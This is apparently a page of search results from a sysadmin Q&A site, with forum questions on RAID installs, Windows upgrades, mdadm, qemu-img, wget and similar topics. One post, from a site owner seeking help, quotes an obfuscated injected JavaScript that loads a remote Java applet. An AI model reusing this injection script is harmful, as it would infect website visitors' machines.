Search Results

Search found 19975 results on 799 pages for 'disk queue length'.

Page 623/799

  • Error 0x80300001 Installing Windows Server 2008 R2 64bit on FastTrak TX4660 RAID volume

    - by Konstantin Boyandin
    I am trying to install Windows Server 2008 R2 Enterprise 64bit on the following hardware: an Intel DBS1200BTL motherboard, a Promise FastTrak TX4660 RAID controller, and 4 disks set up as two RAID1 arrays (handled by the FastTrak). I am trying to install Windows so that it boots from a RAID1 volume created with the FastTrak controller. The installation goes as in the manual: I insert the disk with the driver, select 'Browse' and specify the correct driver; it finds all the RAID arrays but reports error 0x80300001, saying Windows can't be installed on the listed RAID volumes since they may not be bootable (even though the target RAID volume is first in the boot options list). If I proceed with the installation, Windows copies and unpacks itself and performs the other standard steps. After the computer restarts, it won't boot (Windows Boot Manager appears in the boot devices list; however, neither it nor the RAID volume itself will boot). Is this a known problem? I can attach the boot disks to the motherboard and use its RAID capabilities instead, but I'd prefer the FastTrak ones. Driver version is 1.3.0.4. Thanks.

    Read the article

  • windows 8.1 upgrade fails with error code 0xc1900101-0x20017

    - by cmorse
    I just tried to install Windows 8.1 on my laptop, but it fails to install with the message: Sorry we couldn't complete the update to Windows 8.1. We restored your previous version of Windows to this PC 0xC1900101 - 0x20017 It looks like on the first boot the laptop is going to the PC restore screen (it asks what kind of keyboard I have, and then what repair options I would like to take). Thus far I have just been selecting "Continue to Windows 8." I'm running a Lenovo x220i tablet. I've got 43GB of free disk space. It installed just fine on my desktop. The primary difference between the two machines is that the desktop has Media Center installed, and isn't using TrueCrypt. Full WindowsUpdate.log: http://pastebin.com/hGmAW4Q1 Most important portion of WindowsUpdate.log: 2013-10-17 10:41:06:671 964 694 Agent ************* 2013-10-17 10:41:06:671 964 694 Agent ** START ** Agent: Finding updates [CallerId = AutomaticUpdates] 2013-10-17 10:41:06:671 964 694 Agent ********* 2013-10-17 10:41:06:671 964 694 Agent * Online = No; Ignore download priority = No 2013-10-17 10:41:06:671 964 694 Agent * Criteria = "IsInstalled=0 and DeploymentAction='Installation' or IsPresent=1 and DeploymentAction='Uninstallation' or IsInstalled=1 and DeploymentAction='Installation' and RebootRequired=1 or IsInstalled=0 and DeploymentAction='Uninstallation' and RebootRequired=1" 2013-10-17 10:41:06:671 964 694 Agent * ServiceID = {7971F918-A847-4430-9279-4A52D1EFE18D} Third party service 2013-10-17 10:41:06:671 964 694 Agent * Search Scope = {Machine & All Users} 2013-10-17 10:41:06:671 964 694 Agent * Caller SID for Applicability: S-1-5-18 2013-10-17 10:41:07:233 964 870 Report REPORT EVENT: {AD47FBDC-F7F9-4E7F-BAF4-DBA3784C7101} 2013-10-17 10:41:06:436-0600 1 202 [AU_REBOOT_COMPLETED] 102 {00000000-0000-0000-0000-000000000000} 0 0 AutomaticUpdates Success Content Install Reboot completed. 2013-10-17 10:41:07:233 964 870 Report REPORT EVENT: {8D4E7A67-9526-4702-A897-5BE5F97497AF} 2013-10-17 10:41:06:639-0600 1 204 [AGENT_INSTALLING_FAILED_POST_REBOOT] 101 {8951E70D-4332-4F7C-B92D-D9362E384959} 1 c1900101 WSAcquisition Failure Content Install Installation Failure Post Reboot. 2013-10-17 10:41:07:249 964 870 Report CWERReporter::HandleEvents - WER report upload completed with status 0x8 2013-10-17 10:41:07:249 964 870 Report WER Report sent: 7.8.9200.16715 0xc1900101(0x20017) 8951E70D-4332-4F7C-B92D-D9362E384959 Install 101 Unmanaged 2013-10-17 10:41:07:249 964 870 Report CWERReporter finishing event handling. (00000000)

    Read the article

  • Remove Kernel Lock from Unmounted Mass Storage USB Device from the Command Line in Linux

    - by Casey
    I've searched high and low, and can't figure this one out. I have an older Olympus camera (2001 or so). When I plug in the USB connection, I get the following log output: $ dmesg | grep sd [20047.625076] sd 21:0:0:0: Attached scsi generic sg7 type 0 [20047.627922] sd 21:0:0:0: [sdg] Attached SCSI removable disk The drive is not mounted in the FS, but when I run gphoto2 I get the following error: $ gphoto2 --list-config *** Error *** An error occurred in the io-library ('Could not lock the device'): Camera is already in use. *** Error (-60: 'Could not lock the device') *** What command will unmount the drive? For example, in Nautilus I can right-click and select "Safely Remove Device". After doing that, the /dev/sg7 and /dev/sdg devices are removed. The output of gphoto2 is then: # gphoto2 --list-config /Camera Configuration/Picture Settings/resolution /Camera Configuration/Picture Settings/shutter /Camera Configuration/Picture Settings/aperture /Camera Configuration/Picture Settings/color /Camera Configuration/Picture Settings/flash /Camera Configuration/Picture Settings/whitebalance /Camera Configuration/Picture Settings/focus-mode /Camera Configuration/Picture Settings/focus-pos /Camera Configuration/Picture Settings/exp /Camera Configuration/Picture Settings/exp-meter /Camera Configuration/Picture Settings/zoom /Camera Configuration/Picture Settings/dzoom /Camera Configuration/Picture Settings/iso /Camera Configuration/Camera Settings/date-time /Camera Configuration/Camera Settings/lcd-mode /Camera Configuration/Camera Settings/lcd-brightness /Camera Configuration/Camera Settings/lcd-auto-shutoff /Camera Configuration/Camera Settings/camera-power-save /Camera Configuration/Camera Settings/host-power-save /Camera Configuration/Camera Settings/timefmt Some things I've tried already are sdparm and sg3_utils; however, I am unfamiliar with them, so it's possible I just didn't find the right command. Update 1: # mount | grep sdg # mount | grep sg7 # umount /dev/sg7 umount: /dev/sg7: not mounted # umount /dev/sdg umount: /dev/sdg: not mounted # gphoto2 --list-config *** Error *** An error occurred in the io-library ('Could not lock the device'): Camera is already in use. *** Error (-60: 'Could not lock the device') ***
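
    A minimal sketch (assuming the camera enumerated as /dev/sdg, per the dmesg output above) of two command-line ways to detach the SCSI device so gphoto2 can claim it; exact tooling varies by distribution, so treat this as a starting point rather than a confirmed fix:

        # Ask the kernel to eject/stop the removable medium (often enough on its own).
        eject /dev/sdg

        # If gphoto2 still reports "Could not lock the device", drop the SCSI
        # device node entirely -- roughly what Nautilus' "Safely Remove Device"
        # does; replug the camera to get the node back.
        echo 1 | sudo tee /sys/block/sdg/device/delete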

    Read the article

  • What tells initramfs or the Ubuntu Server boot process how to assemble RAID arrays?

    - by Brad
    The simple question: how does initramfs know how to assemble mdadm RAID arrays at startup? My problem: I boot my server and get: Gave up waiting for root device. ALERT! /dev/disk/by-uuid/[UUID] does not exist. Dropping to a shell! This happens because /dev/md0 (which is /boot, RAID 1) and /dev/md1 (which is /, RAID 5) are not being assembled correctly. What I get is /dev/md0 isn't assembled at all. /dev/md1 is assembled, but instead of using /dev/sda2, /dev/sdb2, /dev/sdc2, and /dev/sdd2, it uses /dev/sda, /dev/sdb, /dev/sdc, /dev/sdd. To fix this and boot my server I do: $(initramfs) mdadm --stop /dev/md1 $(initramfs) mdadm --assemble /dev/md0 /dev/sda1 /dev/sdb1 /dev/sdc1 /dev/sdd1 $(initramfs) mdadm --assemble /dev/md1 /dev/sda2 /dev/sdb2 /dev/sdc2 /dev/sdd2 $(initramfs) exit And it boots properly and everything works. Now I just need the RAID arrays to assemble properly at boot so I don't have to manually assemble them. I've checked /etc/mdadm/mdadm.conf and the UUIDs of the two arrays listed in that file match the UUIDs from $ mdadm --detail /dev/md[0,1]. Other details: Ubuntu 10.10, GRUB2, mdadm 2.6.7.1 UPDATE: I have a feeling it has to do with superblocks. $ mdadm --examine /dev/sda outputs the same thing as $ mdadm --examine /dev/sda2. $ mdadm --examine /dev/sda1 seems to be fine because it outputs information about /dev/md0. I don't know if this is the problem or not, but it seems to fit with /dev/md1 getting assembled with /dev/sd[abcd] instead of /dev/sd[abcd]2. I tried zeroing the superblock on /dev/sd[abcd]. This removed the superblock from /dev/sd[abcd]2 as well and prevented me from being able to assemble /dev/md1 at all. I had to $ mdadm --create to get it back. This also put the super blocks back to the way they were.
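
    The short answer to the title question is that the initramfs carries its own copy of /etc/mdadm/mdadm.conf, so boot-time assembly only knows what that embedded copy says. A sketch of the usual way to bring it back in sync on Ubuntu, assuming the arrays are currently assembled correctly in the running system:

        # Capture the arrays exactly as they are assembled right now, append the
        # ARRAY lines to mdadm.conf (review the file for duplicates afterwards),
        # then rebuild the initramfs so the embedded copy matches.
        sudo mdadm --detail --scan | sudo tee -a /etc/mdadm/mdadm.conf
        sudo update-initramfs -u -k all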

    Read the article

  • qemu-img: Could not open $FILE

    - by HTTP500
    I received a single-file VMDK from a vendor that has a virtual appliance for a particular product I'm interested in evaluating. We run a KVM solution (Proxmox), so I tried converting the file, but on that system qemu-img blows up. (I was able to convert (multipart) VMDK files from bitnami without error.) So I figured I'd just yum install qemu-img on a RHEL 6.3 VM and do it there. But despite the fact that the file command identifies the file just fine, when I run qemu-img on it I get this error that it can't open the file: [root@host dir]# file 1.vmdk 1.vmdk: VMware4 disk image [root@host dir]# qemu-img info 1.vmdk qemu-img: Could not open 'vmdk' I've seen some other people post on the interwebs that they've had this problem, but none of them seem to have a resolution. Does anyone have any ideas? I have checked the MD5SUM already. EDIT1: [root@host dir]# qemu-img info -f vmdk 1.vmdk qemu-img: Could not open '1.vmdk' EDIT2: Ran strace per suggestion. Not sure what to look for... Here is a possible culprit: ioctl(3, CDROM_DRIVE_STATUS, 0x7fffffff) = -1 ENOTTY (Inappropriate ioctl for device)
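
    Not a definitive fix, but a sketch of how to see what qemu-img actually objects to, plus a fallback conversion path via VirtualBox tooling if it happens to be installed; the VBoxManage subcommand name assumes an older release (newer ones spell it "clonemedium disk"):

        # Dump the VMDK descriptor; a createType or version field the local
        # qemu-img build does not understand is a common cause of "Could not open".
        head -c 512 1.vmdk | strings

        # Trace file access during the failure; this usually shows whether the
        # main file or a referenced extent is the one it cannot open.
        strace -f -e trace=open,read qemu-img info 1.vmdk 2>&1 | tail -n 20

        # Fallback: let VirtualBox convert it (it accepts more VMDK variants),
        # then convert the raw image to qcow2 with qemu-img as usual.
        VBoxManage clonehd 1.vmdk 1.raw --format RAW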

    Read the article

  • Downloading a file from the internet with '&' in URL using wget

    - by matt_tm
    Hi, I'm trying to download a file from a URL that looks like this: http://pdf.example.com/filehandle.ashx?p1=ABC&p2=DEF.pdf Within the browser, this link prompts me to download a file called x.pdf irrespective of what DEF is (but 'x.pdf' is the right content). However using wget, I get the following: >wget.exe http://pdf.example.com/filehandle.ashx?p1=ABC&p2=DEF.pdf SYSTEM_WGETRC = c:/progra~1/wget/etc/wgetrc syswgetrc = C:\Program Files\GnuWin32/etc/wgetrc --2011-01-06 07:52:05-- http://pdf.example.com/filehandle.ashx?p1=ABC Resolving pdf.example.com... 99.99.99.99 Connecting to pdf.example.com|99.99.99.99|:80... connected. HTTP request sent, awaiting response... 500 Internal Server Error 2011-01-06 07:52:08 ERROR 500: Internal Server Error. 'p2' is not recognized as an internal or external command, operable program or batch file. This is on a Windows Vista system Edit1 >wget.exe "http://pdf.example.com/filehandle.ashx?p1=ABC&p2=DEF.pdf" SYSTEM_WGETRC = c:/progra~1/wget/etc/wgetrc syswgetrc = C:\Program Files\GnuWin32/etc/wgetrc --2011-02-06 10:18:31-- http://pdf.example.com/filehandle.ashx?p1=ABC&p2=DEF.pdf Resolving pdf.example.com... 99.99.99.99 Connecting to pdf.example.com|99.99.99.99|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 4568 (4.5K) [image/JPEG] Saving to: `filehandle.ashx@p1=ABC&p2=DEF.pdf' 100%[======================================>] 4,568 --.-K/s in 0.1s 2011-02-06 10:18:33 (30.0 KB/s) - `filehandle.ashx@p1=ABC&p2=DEF.pdf' saved [4568/4568]
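
    The Edit1 transcript above already shows the essential fix: quoting the URL so the shell (or cmd.exe) does not treat & as a command separator. A small sketch that also names the output file, since the server-side name (filehandle.ashx@...) is not very useful:

        # Quote the whole URL so '&' is passed to wget instead of being parsed by
        # the shell, and pick the local filename with -O.
        wget -O x.pdf "http://pdf.example.com/filehandle.ashx?p1=ABC&p2=DEF.pdf"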

    Read the article

  • Migrating a virtual domain controller for DR exercise

    - by Dips
    Hello gurus, I have a question. I have a requirement where I have a virtual domain controller and I have to migrate it to another virtual server in a different location. It is for test purposes, to test out a DR scenario, and the test will be deemed successful if the users that authenticate using the production DC can do so on the backup DC. I don't know much about this and thus don't know why it was assigned to me. So any assistance will be greatly appreciated. What I had in mind was: 1) Taking a snapshot of the production server and then restoring it on the other server. But I was told that this is not the suggested way of doing it. I was not told why. Is that right? If a snapshot is to be taken, then what is the best way to do it? Any ideas on where I can get the documentation for this? 2) Another way would be to build the test DC from the ground up, match it to the specs of the production DC and then perform the DR test. Is this a better option? What will be needed to perform such an activity? Where can I find documentation on that? I apologise for the length of this query. As I said I am quite a novice and hope to get a better resolution. Any assistance will be greatly appreciated. Regards,

    Read the article

  • Automount in Ubuntu 9.10

    - by easyrider
    Hi, By default Ubuntu doesn't mount internal NTFS hard drives automatically. An fstab solution doesn't work properly because of conflicts with the "intelligent" mount system. If I add my HD to fstab and reboot, it will be mounted. But if I go to Nautilus, open the Places panel, click the eject button (unmount), and then click on the HD again to mount it, I get an error. In 9.04, to solve this problem you needed to modify HAL rules in /etc/hal/... preferences.fdi; in my case I modified it for only one drive. <device> <match key="storage.hotpluggable" bool="false"> <match key="storage.removable" bool="false"> <merge key="storage.automount_enabled_hint" type="bool">false</merge> <match key="storage.model" string="ST3250310NS"> <merge key="storage.automount_enabled_hint" type="bool">true</merge> </match> </match> </match> </device> But this is not working in 9.10 - did the devs move this function from HAL to DeviceKit-disks or udev? I don't know. Could you please tell me where automount rules are stored in 9.10? And how do I create new rules, and what program controls automount in 9.10?
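
    A hedged sketch of where to start looking in 9.10, assuming the DeviceKit-disks command-line tool shipped with that release (it was later renamed udisks); the device node /dev/sdb1 is only a placeholder for your NTFS drive:

        # See which layer is now managing the drive; in 9.10 DeviceKit-disks took
        # over most of the automount policy that HAL handled in 9.04.
        devkit-disks --enumerate
        devkit-disks --show-info /dev/sdb1

        # udev rules (including any hints DeviceKit-disks reads) live here:
        ls /lib/udev/rules.d/ /etc/udev/rules.d/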

    Read the article

  • Malware Cross Site Scriptinig attack / XSS Attack?

    - by user124176
    I have been hit by a Cross-Site Scripting / XSS / RFI attack, but I can't find it anywhere in the source of the files, and the hashes of the files have not been changed according to the OSSEC HIDS that I run for real-time monitoring on all web directories. The attack happens on IE9 only, and it appends JavaScript code like the snippet below; notice that it starts after the /html tag closes normally: scXXpt language="javascXXpt"var enuwjo = function(gqumas, yhxxju, zbkpilf, xzzvhld){var xew = function(iso) {var crh, eaq, i; var owb=""; crh = iso.length; for (i = 0; i < crh; ++i) {eaq = iso.charCodeAt(i)-2;owb = owb + String.fromCharCode(eaq);} return(owb); } var janlq=document.createElement(xew("crrngv"));janlq.setAttribute(xew("eqfg"), xew(gqumas));janlq.setAttribute(xew("ctejkxg"), xew("jvvr<11"+yhxxju));janlq.setAttribute(xew("ykfvj"), "1");janlq.setAttribute(xew("jgkijv"), "1");var lgtwyi=document.createElement(xew("rctco"));lgtwyi.setAttribute(xew("pcog"),xew(zbkpilf));lgtwyi.setAttribute(xew("xcnwg"),xew(xzzvhld));janlq.appendChild(lgtwyi);document.body.appendChild(janlq); } ; enuwjo("vxfgwtogg0dcrcmnwe0encuu","g{g0o{yge{0kp129;5","mlit{ttmdttponfhrrexihpe","fh;ccfe:85:5d9872;2;f569276h5268ff9;34:25;7d:8:7h8c68777;;822c73"); No code has been changed on disk as far as my HIDS says ... but I can see the following in my error log: File does not exist: /var/www/vhosts/superkids.dk/ggtest/tvdeurmee And in the access log, the following: IP - - [09/Jun/2012:23:30:13 +0200] "GET /tvdeurmee/bapakluc.class HTTP/1.1" 404 504 "-" "Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_04" IP - - [09/Jun/2012:23:30:13 +0200] "GET /tvdeurmee/bapakluc/class.class HTTP/1.1" 404 509 "-" "Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_04" Now... the folder or path /tvdeurmee/bapakluc/ does not exist on the server in question, nor does the Java class class.class, yet it still looks like a local call to the server, and it was getting a "404 File not found / 504 Gateway Timeout" (the attack was blocked by the local machine, hence the timeout / not found). Any idea how to prevent the attack? I'm working on using HTML Purifier, but it seems that might not be the correct approach, according to some replies I'm getting on their forum :) Kind regards, Steven
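
    Since the file hashes are unchanged, the script is probably being appended at serve time rather than stored on disk. A sketch of how to confirm that and narrow down where it is injected; the URL, the User-Agent string, and the Debian-style Apache paths are placeholders/assumptions:

        # Fetch the page with and without an IE9 User-Agent and diff the results;
        # if only the IE9 response carries the script, it is added server-side
        # (a rogue module, .htaccess rule, or an upstream proxy).
        curl -s http://www.example.dk/ -o plain.html
        curl -s -A "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" \
             http://www.example.dk/ -o ie9.html
        diff plain.html ie9.html

        # Hunt for User-Agent-conditional rewrites and recently modified Apache
        # configuration or modules.
        grep -ri "MSIE" /var/www --include=".htaccess"
        find /etc/apache2 /usr/lib/apache2/modules -mtime -30 -ls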

    Read the article

  • System Information (msinfo32.exe) Can't Collect Information

    - by ptanne
    I have Windows XP Pro, service pack 1, IE 6, and 32GB of free space, 75GB total. I have had nothing but trouble after trying to install service pack 2, even though I used System Restore. The installation was incomplete and my computer has never been the same. I attempted to install SP2 four or five times and SP3 once, always with the same result. I've tried reinstalling XP Pro but that didn't fix the problem. My XP Pro disk now has a scratch on it and refuses to work. Dell would not replace it, stating that my computer was out of warranty. I'm currently trying Reimage, which is supposed to return a computer to its original configuration and replace missing or damaged files. Believe it or not, Ripley, it stops in the middle of the operation and, so far, the Reimage techs haven't been able to figure out why. One of the many problems that I still have is that System Information can't collect information. The Help and Support sections that display system info also don't work. Is there some way that I can fix this? I can't afford to throw my computer away, yet. Thank you for listening, Pam Galvin

    Read the article

  • Remote Desktop to Server 2008R2 fails from one particular Win7 client

    - by Jesse McGrew
    I have a VPS running Windows Web Server 2008 R2. I'm able to connect using Remote Desktop from my home PC (Windows 7), personal laptop (Windows 7), and work laptop (Windows XP). However, I cannot connect from my work PC (Windows 7). I receive the error "The logon attempt failed" in the RDP client, and the server event log shows "An account failed to log on" with this explanation: Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Logon Type: 3 Account For Which Logon Failed: Security ID: NULL SID Account Name: username Account Domain: hostname Failure Information: Failure Reason: Unknown user name or bad password. Status: 0xc000006d Sub Status: 0xc0000064 Process Information: Caller Process ID: 0x0 Caller Process Name: - Network Information: Workstation Name: JESSE-PC Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: NtLmSsp Authentication Package: NTLM Transited Services: - Package Name (NTLM only): - Key Length: 0 I can connect from the offending work PC if I start up Windows XP Mode and use the RDP client inside that. The server is part of a domain but my account is local, so I'm logging in using a username of the form hostname\username. None of the clients are part of a domain. The server uses a self-signed certificate, and connecting from home I get a warning about that, but connecting from work I just get the logon error.

    Read the article

  • Re: How can Django/WSGI and PHP share / on Apache?

    - by Bogdan
    in response to: How can Django/WSGI and PHP share / on Apache? Hello, could you please post the complete config file from /sites-available? I am having a problem: it seems like the rewrite engine redirects all requests to Django, so static and PHP files are not served and instead I see the Django 404 page. If I get rid of the rewrite rule, then static files and PHP work. Here is my Apache config file from /sites-available: <VirtualHost *:80> ServerAdmin webmaster@localhost DocumentRoot /home/www/django <Directory /> Options +FollowSymLinks ExecCGI Indexes AllowOverride None DirectoryIndex index.php AddHandler wsgi-script .wsgi </Directory> RewriteEngine On RewriteCond %{REQUEST_FILENAME} !-f RewriteRule ^(.*)$ /mysite.wsgi/$1 [QSA,PT,L] ~ and my .wsgi file: import site site.addsitedir('/home/user/.virtualenvs/url.com/lib/python2.6/site-packages') import os, sys path = '/home/www/django' if path not in sys.path: sys.path.append(path) os.environ['DJANGO_SETTINGS_MODULE'] = 'mysite.settings' sys.path.append(path + '/mysite') import django.core.handlers.wsgi _application = django.core.handlers.wsgi.WSGIHandler() import posixpath def application(environ, start_response): # Wrapper to set SCRIPT_NAME to actual mount point. environ['SCRIPT_NAME'] = posixpath.dirname(environ['SCRIPT_NAME']) if environ['SCRIPT_NAME'] == '/': environ['SCRIPT_NAME'] = '' return _application(environ, start_response) The document root directory on disk (/home/www/django) contains PHP files, images, and the mysite.wsgi file. Thanks for your help

    Read the article

  • Windows NT from vmware to kvm

    - by Luca Rossi
    I'm trying to convert a couple of old Windows NT virtual servers from VMware to KVM. I tried almost all the guidelines and how-tos I found around the web, but with no luck. I have the VMware virtual disk Dlc1.vmdk, a partitioned image. I converted the vmdk into a qcow2 image with the qemu utility and tried to use it with kvm: kvm -hda test.qemu -vnc :1 -m 750 but I receive "error loading operating system". I also tried with raw partitions I can mount through losetup and kpartx, but nothing changed. I also tried to create a brand new image file with: qemu-img create -f qcow2 test.qcow2 2G I partitioned the new image file and copied the original partition 1 to the new partition 1 with dd: dd if=/dev/mapper/loop1p1 of=/dev/mapper/loop0p1 bs=128M No luck again. I also tried with a single unpartitioned file: qemu-img create -f qcow2 test.qcow2 2G and copied partition 1 to the new image file: dd if=/dev/mapper/loop0p1 of=test.img bs=128M but when booting, I receive a black screen and the virtual machine hangs. The bootloader is loaded successfully, because I also tried with a GRUB live ISO and I receive the same screens and errors. Note that GRUB sees the Windows setup and gives me the boot choice. I suspect the problem is that the VMware machine is probably a SCSI guest, and in CentOS 6 (my system) SCSI emulation is no longer supported. But in that case, what do I change in Windows? I'm not so skilled with MS systems. Thank you for the help, Luca Rossi
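
    A sketch of the conversion/boot combination that usually works for NT-era guests, assuming the VMDK converts cleanly; the point is to present the disk on plain IDE with a legacy NIC, since NT has no drivers for anything newer (file names are illustrative):

        # qemu-img reads VMDK directly, so convert in one step.
        qemu-img convert -f vmdk -O qcow2 Dlc1.vmdk nt.qcow2

        # Boot with explicit IDE disk emulation and an old NIC model.
        kvm -m 750 -vnc :1 \
            -drive file=nt.qcow2,if=ide,media=disk \
            -net nic,model=rtl8139 -net user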

    Read the article

  • How does SELinux affect the /home directory?

    - by Matt Solnit
    Hi everyone. I'm migrating a CentOS 5.3 system from MySQL to PostgreSQL. The way our machine is set up is that the biggest disk partition is mounted to /home. This is out of my control and is managed by the hosting provider. Anyway, we obviously want the database files to be on /home for this reason. With MySQL, we did the following: Edited my.cnf and changed the datadir setting to /home/mysql Added a new "File type" policy record (I hope I'm using the right terminology) to set /home/mysql(/.*)? to mysqld_db_t Ran restorecon -R /home/mysql to assign the labels and everything was good. With PostgreSQL, however, I did the following: Edited /etc/init.d/postgresql and changed the PGDATA and PGLOG variables to /home/pgsql/data and /home/pgsql/pgstartup.log, respectively Added a new policy record to set /home/pgsql/pgstartup.log to postgresql_log_t Added a new policy record to set /home/pgsql/data(/.*)? to postgresql_db_t Ran restorecon -R /home/pgsql to assign the labels At this point, I still cannot start PostgreSQL. pgstartup.log says: # cat pgstartup.log postmaster cannot access the server configuration file "/home/pgsql/data/postgresql.conf": Permission denied The weird thing is that I don't see any messages related to this in /var/log/messages or /var/log/secure, but if I turn off SElinux, then everything works. I made sure all the permissions are correct (600 for files and 700 for directories), as well as the ownership (postgres:postgres). Can anyone tell me what I am doing wrong? I'm using the Yum repository from commandprompt.com, version 8.3.7. EDIT: The reason my question specifically mentions the /home directory is that if I go through all these steps for any other directory, e.g. /var/lib/pgsql2 or /usr/local/pgsql, then it works as expected.
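
    Not the confirmed cause, but the usual culprit here is that postgres must also be allowed to traverse the parent directories under /home, not just read its own files, and those parents keep home-specific types. A sketch of the checks and of doing the labeling from the command line (assumes the policycoreutils-python tools are installed):

        # Show contexts along the whole path; a parent left as home_root_t or
        # user_home_dir_t can block traversal even when the data files are fine.
        ls -ldZ /home /home/pgsql /home/pgsql/data

        # Persistent labeling rules (equivalent to the policy records added above),
        # then relabel.
        semanage fcontext -a -t postgresql_db_t  "/home/pgsql/data(/.*)?"
        semanage fcontext -a -t postgresql_log_t "/home/pgsql/pgstartup.log"
        restorecon -Rv /home/pgsql

        # If nothing shows up in audit.log, temporarily disable dontaudit rules
        # and retry the service start to expose the hidden denial.
        semodule -DB
        grep postgres /var/log/audit/audit.log | tail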

    Read the article

  • Everything on hard drive suddenly vanished without explanation, but the drive seems otherwise functional

    - by user160705
    Windows 7 Ultimate x64 Custom-built desktop I have a new desktop that I built a few months ago that has a four-year-old WD hard drive and a two-year-old drive. I had set it up so that the newer drive had Windows and most of my files on it while the older drive had my music library, some movies and games, and a backup of all of my documents. About a month ago, I installed some new case fans and, in the process, I temporarily unplugged my hard drive (while the computer was off of course - I took all the necessary precautions) for wire management. I plugged it back in, and didn't really think anything of it. At around that time, however, I noticed that my older hard drive wasn't showing up in Windows Explorer anymore but I didn't really have time to check into it (I had just started college) and I'm finally getting a chance to now. That drive doesn't show up in Windows Explorer at all but it does show up in Disk Management. That screen shows the following: http://puu.sh/17mMN Any idea what happened? Is there any way to recover my files? Thanks in advance for your help! EDIT: The music and games and stuff used to be on "Disc 1", the 465.71 GB of what is now showing as unallocated space.

    Read the article

  • Chunking large rsync transfers?

    - by Gabe Martin-Dempesy
    We use rsync to update a mirror of our primary file server to an off-site colocated backup server. One of the issues we currently have is that our file server has 1TB of mostly smaller files (in the 10-100kb range), and when we're transferring this much data, we often end up with the connection being dropped several hours into the transfer. Rsync doesn't have a resume/retry feature that simply reconnects to the server to pick up where it left off -- you need to go through the file comparison process, which ends up being very lengthy with the number of files we have. The solution that's recommended to get around this is to split up your large rsync transfer into a series of smaller transfers. I've figured the best way to do this is by the first letter of the top-level directory names, which doesn't give us a perfectly even distribution, but is good enough. I'd like to confirm whether my methodology for doing this is sane, or if there's a simpler way to accomplish the goal. To do this, I iterate through A-Z, a-z, 0-9 to pick a one-character $prefix. Initially I was thinking of just running rsync -av --delete --delete-excluded --exclude "*.mp3" "src/$prefix*" dest/ (--exclude "*.mp3" is just an example, as we have a more lengthy exclude list for removing things like temporary files) The problem with this is that any top-level directories in dest/ that are no longer present on src will not get picked up by --delete. To get around this, I'm instead trying the following: rsync \ --filter 'S /$prefix*' \ --filter 'R /$prefix*' \ --filter 'H /*' \ --filter 'P /*' \ -av --delete --delete-excluded --exclude "*.mp3" src/ dest/ I'm using show and hide over include and exclude, because otherwise --delete-excluded will delete anything that doesn't match $prefix. Is this the most effective way of splitting the rsync into smaller chunks? Is there a more effective tool, or a flag that I've missed, that might make this simpler?
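
    A sketch of the alternative that is often simpler than chunking on flaky links: keep a single rsync invocation but wrap it in a retry loop with --partial and --timeout, so a dropped connection just reconnects and resumes rather than requiring manual splitting (exclude list abbreviated as in the question):

        #!/bin/bash
        # Retry until rsync exits cleanly. --partial keeps partially transferred
        # files; --timeout makes a hung connection fail fast so the loop can
        # reconnect instead of sitting idle for hours.
        until rsync -av --delete --delete-excluded --exclude "*.mp3" \
                    --partial --timeout=300 src/ dest/; do
            echo "rsync dropped (exit $?), retrying in 60s" >&2
            sleep 60
        done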

    Read the article

  • Subversion and Quickbooks Files

    - by Jorge Fernandez
    I currently have a large problem on one of the file servers I manage for an accounting firm. QuickBooks has a tendency to create multiple files of the same thing over and over to prevent data loss. This is a good thing when you handle just a few files, but at an accounting firm it becomes a problem. Some of the older clients have 5-10 files in their respective folders, each with a different cut-off date. Because of user error, some of these files aren't labeled properly with their correct cut-off dates. This is where Subversion came to mind. Using the revision system would allow for one file to be the master and have all of its revisions. Has anyone ever tried this with QuickBooks files? I've only used SVN with code for applications, where each file is much smaller. How does SVN stand up with larger files like 10-25MB? I'm not exactly sure how SVN handles revisions - does it keep a duplicate of the files and duplicate the disk space needed?
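
    On the disk-space question: the repository stores binary deltas between revisions rather than full copies, while every working copy keeps a pristine duplicate of each checked-out file (so client-side space is roughly doubled). A small sketch for measuring the real cost with one of your own files; the .QBW file names are hypothetical:

        # Scratch repository: commit the same QuickBooks file twice and watch
        # how much the repository actually grows per revision.
        svnadmin create /tmp/qbrepo
        svn checkout file:///tmp/qbrepo /tmp/qbwc
        cp client.QBW /tmp/qbwc/ && svn add /tmp/qbwc/client.QBW
        svn commit -m "initial copy" /tmp/qbwc
        du -sh /tmp/qbrepo

        cp client-after-edits.QBW /tmp/qbwc/client.QBW
        svn commit -m "after a day of edits" /tmp/qbwc
        du -sh /tmp/qbrepo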

    Read the article

  • SAN performance issues storing SQL Server tempdb on a SAN that's being backed up

    - by user42724
    I'm afraid I don't know much about SANs, so please forgive my lack of detail or technical terms. As a developer, I've just completed a new application and put it on an existing production system, but it would appear to have tipped the scales regarding the performance of the backups being taken from the SAN. As I understand it, there's a mirror of the SAN being taken, usually constantly, at the block level. However, there seem to be so many new writes to the disk that the SAN mirroring/backup process can no longer keep up. I believe I've narrowed this down to SQL Server's tempdb, which exists on a drive that contributes the largest portion of the problem! In fact, I think tempdb has been contributing the largest portion of the issues all along, regardless of my application! My question therefore is whether tempdb should ever be mirrored or backed up on the SAN, and whether anyone else has gone through this sort of pain already? I'm wondering whether it's a best practice to make sure that tempdb is never mirrored on a SAN, simply because any writes to it don't need to be saved. This also raises a slightly connected question - is it better to rely on SQL Server's built-in database backup tools (DB in full-recovery mode with full/differential and transaction log backups) or, as is the case with our application, to leave SQL Server in simple recovery mode and never back it up, since the SAN is mirrored and backed up? Many thanks

    Read the article

  • Can ping IP address and nslookup hostname but cannot ping hostname

    - by jao
